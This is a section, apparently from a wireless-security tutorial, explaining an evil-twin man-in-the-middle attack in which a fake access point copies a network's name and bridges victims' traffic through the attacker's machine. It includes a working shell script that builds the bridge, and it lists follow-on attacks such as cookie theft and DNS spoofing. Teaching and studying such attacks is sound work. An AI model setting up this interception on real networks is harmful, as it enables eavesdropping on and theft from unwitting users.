4.1 - Man-In-The-Middle (MITM) wireless setup
The basic idea of a MITM attack is that the attacker takes a position between the legitimate users of a network, so that it can eavesdrop on their communication, gain access to the victims' connections, and relay messages between them. The victims believe they are talking to each other directly, while in fact the attacker controls the whole exchange.
There are many possible architectures or layouts for a MITM attack, depending on the topology, characteristics and technologies available in the network. In this chapter the setup consists of the victim "roch" trying to communicate with the legitimate AP, and the attacker "kali" intercepting and relaying the packets between them.
In this setup the attacker "kali" is connected to the Internet through a wired LAN on its Ethernet interface eth0. At the same time "kali" creates a fake AP that broadcasts the same ESSID as the legitimate one. The victim "roch" then associates with the fake AP, believing it is connected to the legitimate AP: the ESSID does not authenticate an AP, so a client cannot tell the two apart by name alone.
For that purpose "kali" creates a bridge between its wired interface and the virtual wireless interface of the fake AP, so that all packets are forwarded through the bridge to and from the Internet.
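The bridge step described above, written out as an added example (this script is not part of the original text). It assumes interface names the page does not give: the wired uplink is eth0, the fake AP exposes a tap interface called at0 (the name airbase-ng uses), and the bridge is br0. The commands are generated by a separate function so the plan can be reviewed with the "plan" argument before running it as root with "up".

```shell
#!/bin/sh
# Added example, not from the original page: join the attacker's wired uplink
# and the fake AP's virtual interface into one layer-2 bridge, so the victim's
# frames reach the Internet through the attacker's box.
#
# Assumed names (not stated on the page): eth0 = wired uplink, at0 = tap
# interface created by the fake AP, br0 = the bridge. Override via environment.
WIRED="${WIRED:-eth0}"
VWIFI="${VWIFI:-at0}"
BRIDGE="${BRIDGE:-br0}"

# Emit the iproute2 commands that build the bridge, one per line.
# A pure function: nothing touches the system until bridge_up runs it.
bridge_cmds() {
    wired="$1"; vwifi="$2"; br="$3"
    cat <<EOF
ip link add name $br type bridge
ip addr flush dev $wired
ip link set $wired master $br
ip link set $vwifi master $br
ip link set $wired up
ip link set $vwifi up
ip link set $br up
EOF
}
# Note: flushing the address from the wired port is deliberate. Once eth0 is a
# bridge port, the IP address belongs on br0, otherwise the attacker loses its
# own connectivity even though the victim's traffic is bridged fine.

# Execute the plan (root required). With DRY_RUN=1 it only echoes each step.
bridge_up() {
    bridge_cmds "$WIRED" "$VWIFI" "$BRIDGE" | while IFS= read -r cmd; do
        if [ "${DRY_RUN:-0}" = "1" ]; then
            echo "+ $cmd"
        else
            $cmd
        fi
    done
    # Give the bridge an address on the wired LAN. Assumption: the upstream
    # router runs DHCP. The victim's own DHCP exchange crosses the bridge the
    # same way, so it ends up with a real LAN address and gateway.
    [ "${DRY_RUN:-0}" = "1" ] || dhclient "$BRIDGE"
}

# Check: a port is bridged only if the kernel lists the bridge as its master.
# Usage: bridge_ok eth0 br0
bridge_ok() {
    ip -o link show "$1" | grep -q "master $2"
}

case "${1:-}" in
    up)   bridge_up ;;
    plan) DRY_RUN=1; bridge_up ;;
esac
```

Run "sh bridge.sh plan" to see the exact commands for the chosen names, then "sh bridge.sh up" as root. After that, "bridge_ok at0 br0" and "bridge_ok eth0 br0" should both succeed, and "bridge link show" lists both ports. No IP forwarding or NAT is involved: the bridge works at layer 2, which is exactly why the victim sees the same DHCP server and gateway it would see on the real network.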
The attacker "kali" can then analyze every packet sent and received by the victim "roch": not only eavesdropping on all the wireless traffic, but also modifying it with malicious intent, as will be seen later. Examples include hijacking web sessions, mounting denial-of-service attacks, redirecting the victim to sites built for the attack, stealing cookies or passwords, redirecting ports, and spoofing DNS requests and responses. Note that the contents are only readable, and modifiable, for traffic that is not end-to-end encrypted; for TLS-protected sessions the attacker still sees metadata such as destination addresses and DNS lookups, but not the payload.